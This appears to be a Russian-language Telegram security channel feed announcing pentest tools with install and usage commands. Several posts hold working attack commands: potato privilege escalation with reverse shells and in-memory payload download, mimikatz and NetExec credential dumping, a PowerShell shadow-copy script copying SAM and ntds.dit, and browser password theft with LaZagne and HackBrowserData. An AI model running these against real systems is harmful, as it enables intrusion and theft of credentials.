Whitehat Lab
2.08K subscribers
344 photos
393 links
Авторский канал об информационной безопасности 🔐
Свежие CVE, Red Team инструменты, внутренняя инфраструктура и другое

Чат: @whitehat_chat

Все материалы предназначены исключительно в образовательных целях
Download Telegram
🔄 🖼️ Ferox buster v2.11.0

Современный высокоскоростной фаззер, написанный на Rust.
Огромное количество настроек. Во время сканирования позволяет работать в интерактивном режиме не прерывая работу.

Установка в Kali:

sudo apt update && sudo apt install -y feroxbuster


Windows
via chocolatey или winget:

choco install feroxbuster

winget install epi052.feroxbuster


Примеры:

feroxbuster -u https://127.1 -x pdf -x js,html -x php txt json,docx

feroxbuster -u https://127.1 -H Accept:application/json "Authorization: Bearer {token}"

feroxbuster -u https://127.1 --insecure --proxy https://127.0.0.1:8080

cat targets | feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files

feroxbuster -u https://127.1 --extract-links

feroxbuster -u https://127.1 --filter-status 301

feroxbuster -u https://127.1 --filter-regex '[aA]ccess [dD]enied.?' --output results.txt --json


💻 Home
👩‍💻 Документация

#feroxbuster #fuzzing #rust #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄❗️ Trivy v 0.61.0

Сканер уязвимостей в контейнерах и не только. Написан на 💻

Цели:

▪️ Контейнеры
▪️ Файловые системы
▪️ Git репозитории (удаленный)
▪️ Образы ВМ
▪️ Kubernetes
▪️ AWS

Сканирует:

▪️ ПО и зависимости
▪️ Известные уязвимости (CVEs)
▪️ Мисконфиги
▪️ Чувствительную информацию

Установка в 🐧 Debian like:

wget https://github.com/aquasecurity/trivy/releases/download/v0.56.2/trivy_0.56.2_Linux-64bit.deb

sudo dpkg -i trivy_0.56.2_Linux-64bit.deb


Примеры:

trivy <target> [--scanners <scanner1,scanner2>] <subject>

trivy image python:3.4-alpine

trivy fs --scanners vuln,secret,misconfig myproject/

trivy k8s --report summary cluster

trivy sbom /path/to/sbom_file


💻 Github
💻 Releases
📔 Docs

#trivy #soft #golang

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻ApacheTomcatScanner v3.7.2

Узкоспециализированный инструмент написанный на 💻 python для поиска уязвимостей веб-сервера Apache Tomcat

Установка
:

sudo python3 -m pip install apachetomcatscanner


Запуск:

ApacheTomcatScanner -tt 172.16.0.10 -tp - —-list-cves


▪️ Проверка доступности
▪️ Многопоточность
▪️ Проверка стандартных УД
▪️ Определение версии
▪️ Список уязвимостей и CVE
▪️ Поддержка прокси
▪️ Экспорт в xlsx, json, sqlite

💻 Download

#tomcat #apache #apachetomcatscanner #soft #python

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄🔺 Dalfox 2.10.0

Мощный инструмент для поиска и обнаружения XSS уязвимостей. Написан на 🖼️ Go

Установка:
go install github.com/hahwul/dalfox/v2@latest

Пример:
dalfox url https://testphp.vulnweb.com/listproducts.php?cat=123&artist=123&asdf=ff -b https://your-callback-url

💻 Home
🔠 Wiki

#soft #dalfox #golang

✈️Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
💻 🗂 Доклады с конференции Black Hat USA 2024

Notes from Black Hat USA 2024:
“I hate to report it, but the Russian underground is as strong as ever”


🎃👍

💻 Home
💻 Download

#pentest #blackhat #blackhatusa

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🪟 📞 DeadPotato v 1.2

Пополнение в "картофельном" семействе. Как и для остальных необходима привилегия SeImpersonatePrivilege

Возможности:

deadpotato.exe -cmd "whoami"
deadpotato.exe -rev 192.168.10.30:9001
deadpotato.exe -exe paylod.exe
deadpotato.exe -newadmin adm:pass
deadpotato.exe -shell
deadpotato.exe -mimi sam
deadpotato.exe -defender off
deadpotato.exe -sharphound


💻 Home

#lpe #windows #potato #soft #csharp

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 📞 The LaZagne Project v2.4.6

Инструмент для восстановления забытых 😄 паролей, написан на Python 💻 На самом деле средство пост эксплуатации, поддерживается большое количество программ: браузеры, IM, почтовые клиенты.

📌 Список

Примеры использования:

laZagne.exe all
laZagne.exe browsers -firefox
laZagne.exe all -oA -output C:\Users\test\Desktop
laZagne.exe all -quiet -oA
laZagne.exe all -password Password


💻 Home
💻 Download

#lazagne #python #password #recovery #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 Ghauri v1.4.2

🔺 Продвинутый кроссплатформенный инструмент, автоматизирующий процесс обнаружения и эксплуатации 🔥 SQL-инъекций.
Если вкратце то SQLMap на минималках 😃
Проект интересный. С простенькими заданиями справился, что приятно удивило!

Поддерживаемые техники:

Boolean based
Error Based
Time Based
Stacked Queries


Поддерживаемые СУБД:

MySQL
Microsoft SQL Server
Postgres
Oracle


Поддерживаемые типы:

GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML


⚙️ Установка и запуск:

git clone https://github.com/r0oth3x49/ghauri.git

python3 -m pip install --upgrade -r requirements.txt


python3 setup.py install

ghauri -u 'https://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs

💻 Download

#ghauri #sqli #sqlinjection #python #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😭 Windows dump SAM, NTDS

SAM - Security Account Manager. Хранит информацию о локальных пользователях, включая хеши паролей и идентификаторы

NTDS - основной файл ntds.dit NT Directory Services, dit - Directory Information Tree
БД в которой хранится информация обо всех объектах. Находится на контроллере домена

Есть различные варианты получить данные файлы, например с помощью mimikatz или NetExec

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

.\mimikatz.exe "privilege::debug" "lsadump::lsa /inject" "exit"


nxc smb 192.168.1.100 -u da -p 'PASSWORDHERE' --sam

nxc smb 192.168.1.100 -u da -p 'PASSWORDHERE' --ntds


Доработал простенький скрипт на 🏃 PowerShell, который используя службу теневого копирования (VSS) позволит скопировать данные файлы. Необходимы повышенные привилегии

Работает на десктопных (понятно без ntds.dit) и на серверных системах, включая DC

Скрипт при необходимости создает директорию C:\Temp и копирует туда файлы, так же включает VSS и по окончании работы отключает.
Запускать в классическом 🏃 Windows PowerShell (в 7.x не отработает)

$vss=(Get-Service -name VSS)

if($vss.Status -ne "Running"){

$notrunning=1; $vss.Start()

}

$tempdir = "C:\Temp"

if (!(Test-Path $tempdir)) {

New-Item -ItemType Directory -Path $tempdir

}

$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")

cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" $tempdir
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\system" $tempdir

if (Test-Path -Path "C:\Windows\NTDS\ntds.dit") {

cmd /c copy "$($volume.DeviceObject)\Windows\NTDS\ntds.dit" $tempdir

}

$volume.Delete(); if($notrunning -eq 1){

$vss.Stop()

}


Полученные файлы разбираем в 💻 Kali использую secretsdump из пакета impacket

impacket-secretsdump LOCAL -sam SAM -system SYSTEM

impacket-secretsdump LOCAL -ntds ntds.dit -system SYSTEM


Что делать с хешиками вы уже знаете 😄👍

💻 Скрипт

#windows #sam #ntds #hashes #powershell

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 😀 RustScan v2.4.1

Очень быстрый сканер портов написанный на Rust

Установка в Debian like:

sudo dpkg -i rustscan_(ver).deb

Использование:

rustscan -a 127.0.0.1,0.0.0.0
rustscan -a 192.168.0.0/30
rustscan -a 'hosts.txt'
rustscan -a 127.0.0.1 --range 1-1000

💻 Home
💻 Download

#rustscan #rust #soft #recon

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 💻 HackBrowserData v0.4.6

Инструмент помогающий вспомнить "забытые" пароли от различных браузеров. Также извлекает 🍪 cookie, закладки и историю. Написан на 💻 Go

Поддержка браузеров в 💻 Windows:

Google Chrome
Chromium
Microsoft Edge
360 Speed
QQ
Brave
Opera
OperaGX
Vivaldi
Yandex
CocCoc
Firefox


Примеры использования:

hack-browser-data.exe -b all -f json --dir results --zip

hack-browser-data.exe -b chrome -p "C:\Users\User\AppData\Local\Microsoft\Edge\User Data\Default"


💻 Home
💻 Download

#hackbrowserdata #golang #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖥 NTLM hashes database

Сервис уже не новый, но крайне полезный
Я немного запоздал с постом 😄👍

🔗 https://ntlm.pw

#ntlm #hash

✈️Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🔄 🖼️ Ferox buster v2.11.0

Современный высокоскоростной фаззер написанный на Rust.
Огромное количество настроек. Во время сканирования позволяет работать в интерактивном режиме не прерывая работу.

Kali:
sudo apt update && sudo apt install -y feroxbuster

Windows
via chocolatey:
choco install feroxbuster

Примеры:

feroxbuster -u https://127.1 -x pdf -x js,html -x php txt json,docx

feroxbuster -u https://127.1 -H Accept:application/json "Authorization: Bearer {token}"

feroxbuster -u https://127.1 --insecure --proxy https://127.0.0.1:8080


💻 Home
👩‍💻 Docs

#feroxbuster #fuzzing #rust #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🏃 SigmaPotato 1.2.6

Инструмент для повышения привилегий в 🏠 Windows системах основанный на эксплоитах "картофельного" семейства (в частности GodPotato)
Напомню что для реализации необходимо чтобы УЗ обладала привилегией SeImpersonatePrivilege или SeAssignPrimaryTokenPrivilege

Обычно присутствует у сервисных УЗ, например IIS, MSSQL и т.д.

whoami /priv

Из плюсов возможность запуска как с диска, так и из памяти, а также создание revshell'a

Примеры:

./SigmaPotato.exe --revshell ip port

[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s)://<ip_addr>/SigmaPotato.exe"))

[SigmaPotato]::Main(@("--revshell","ip","port"))


Windows 8/8.1 - Windows 11
Windows Server 2012 - Windows 2022


💻 Home
💻 Download

#potato #lpe #windows #soft #sigmapotato

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🎟 btconverter

При пентесте 🪟 Active Directory очень часто приходиться работать с Kerberos и в частности с получением и использованием билетов

Для данных целей обычно используют следующие инструменты:

💻 Rubeus
💻 Impacket

При дампе или запросе в Rubeus мы получим закодированный в base64 билет

Если захотим использовать его в инструментах impacket, необходимо конвертировать в формат ccache

Обычно это делается так:

echo "doIGIDCCBhygAwIBBaE(..snip..)9SRzE3LkxPQ0FM" | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache


При получение билета в impacket будем конвертировать в обратном порядке. Иной раз делать это приходиться очень часто, поэтому написал небольшой скрипт для автоматизации данной задачи

Для работы скрипта в 💻 Kali есть все необходимые тулзы. Если по какой то причине impacket не установлен:

sudo apt update
sudo apt install python3-impacket


Далее ставим скрипт:

wget https://raw.githubusercontent.com/akhomlyuk/btconverter/main/btconverter.sh
chmod +x btconverter.sh
sudo mv btconverter.sh /usr/bin/btconverter


На вход принимает 1 аргумент, билет в формате .b64|kirbi|ccache

btconverter ticket.b64
btconverter ticket.ccache
btconverter ticket.kirbi

Готово!

💻 Home

#kerberos #tickets #bash #impacket #rubeus

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖼️ pspy v1.2.1

Отличный инструмент предназначенный для отслеживания процессов без необходимости использования root прав. Он позволяет видеть команды выполняемые другими пользователями, задания cron и т. д.
Написан на Go. Постоянно использую при решение машин на 🙃 HTB, 😁 THM и др. платформах.

Запуск в 🥸 Debian like:

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64

chmod +x pspy64
./pspy64

-r - список директорий для отслеживания (по дефолту /usr, /tmp, /etc, /home, /var и /opt)
-i - интервал в мс
-f - события файловой системы
--debug - вывод подробной информации


Готово, рекомендую!

💻 Home

#golang #pspy #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖼️ 🔄 Moriarty v1.2

Чекер CVEs и уязвимостей написанный на C# для ОС 🏠 Windows

Поддерживаемые версии:

Windows 10 (Versions: 1507, 1511, 1607, 1703, 1709, 1803, 1809, 1903, 1909, 2004, 20H2, 21H1, 21H2, 22H1, 22H2)
Windows 11 (Versions: 21H2, 22H1, 22H2, 23H1)
Windows Server 2016, 2019, 2022


Список уязвимостей (35):

MS10-015
MS10-092
MS13-053
MS13-081
MS14-058
MS15-051
MS15-078
MS16-016
MS16-032
MS16-034
MS16-135
CVE-2017-7199
CVE-2019-0836
CVE-2019-0836
CVE-2019-1064
CVE-2019-1130
CVE-2019-1253
CVE-2019-1315
CVE-2019-1385
CVE-2019-1388
CVE-2019-1405
CVE-2020-0668
CVE-2020-0683
CVE-2020-0796
CVE-2020-1013
CVE-2020-1013
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
CVE-2021-44228
CVE-2021-36934
CVE-2022-40140
CVE-2022-22965
CVE-2023-36664


1.2 added:
2023-23397
2022-34718

👉 Описание уязвимостей

Также бот поддерживает поиск эксплоитов по CVE

!poc CVE-2019-1064

💻 Home

Для сборки понадобится Visual Studio и .NET Framework 4.8 Developer Pack

#moriarty #checker #csharp

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🖼️ SharpCollection

Сборник скомпилированных C# инструментов для наступательной безопасности.
Для ленивых или когда под рукой нет 💻 VS

Некоторые:

➡️ SharpChisel
➡️ SharpKatz
➡️ SharpUp
➡️ Whisker
➡️ winPEAS
➡️ Certify
➡️ KrbRelay
➡️ Rubeus
➡️ RunasCs
➡️ Seatbelt

86 инструментов

💻 Collection

#csharp #collection #soft

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
⚙️ ffuf - Fuzz Faster U Fool v2.1.0

💻 Очень быстрый веб фаззер написанный на 🖼️ Go

Fuzzing
- перебор директорий, параметров, заголовков (headers)
ffuf поддерживает множество настроек, работа через прокси, различные фильтры (размер, кол-во строк, символов). GET/POST запросы.
В 💻 Kali установлен по умолчанию.

Установка:

go install github.com/ffuf/ffuf/v2@latest

Примеры использования:

ffuf -w /wordlists/rockyou.txt -u https://example.com/FUZZ
ffuf -w /wordlists/rockyou.txt -u https://example.com/page.php?FUZZ=1
ffuf -w /wordlists/rockyou.txt -u https://example.com -H "Host: FUZZ.example.com"


Основные фильтры:
fc - HTTP status (-fc 404)
fs - размер ответа (-fs 0)
fl - кол-во линий (-fl 16)
fw - кол-во слов (-fw 2)


Заворачиваем в 😈 Burp (proxy):

-x "https://127.0.0.1:8080"

Флаг -c сделает вывод цветным, рекомендую, по дефолту - False

💻 Home

#ffuf #fuzzing #fuzzer #golang

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
😁1
🏠 Кибербезопасность для новичков

7 уроков от Microsoft

Что охватывает курс 📚:

🔐 Основные концепции кибербезопасности, различия между рисками, угрозами и т.д.
🛡 Что такое меры безопасности и какие формы они могут принимать
🌐 Понимание того, что такое zero trust и почему это важно в современной кибербезопасности
🔑 Ключевые концепции и темы, связанные с идентификацией, сетевыми технологиями, операциями в области безопасности, инфраструктуры и защиты данных
🔧 Примеры инструментов, используемых для реализации мер безопасности

Чего курс не охватывает 🚫:

🚫 Как использовать конкретные инструменты безопасности
🚫 Hacking, red teaming/offensive security
🚫 Обучение стандартам соответствия

💻 Cybersecurity by microsoft

#microsoft #cybersecurity

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM
🥷 Autopsy v 4.22.0

Замечательный open source продукт которым пользуются кибер-криминалисты по всему миру. Это графический интерфейс для коллекции утилит под названием The Sleuth Kit (TSK)
Работает с образами дисков и не только, список поддерживаемых файловых систем: NTFS, FAT, ExFAT, UFS 1, UFS 2, EXT2FS, EXT3FS, Ext4, HFS, ISO 9660, и YAFFS2

В 🐧 Kali Linux имеется в репозиториях и ставится одной командой: sudo apt install autopsy

Также есть версии для Windows, Linux и OS X

➡️ Download
➡️ The Sleuth Kit
💻 Modules

#autopsy #sleuthkit #forensics #dfir

✈️ Whitehat Lab
Please open Telegram to view this post
VIEW IN TELEGRAM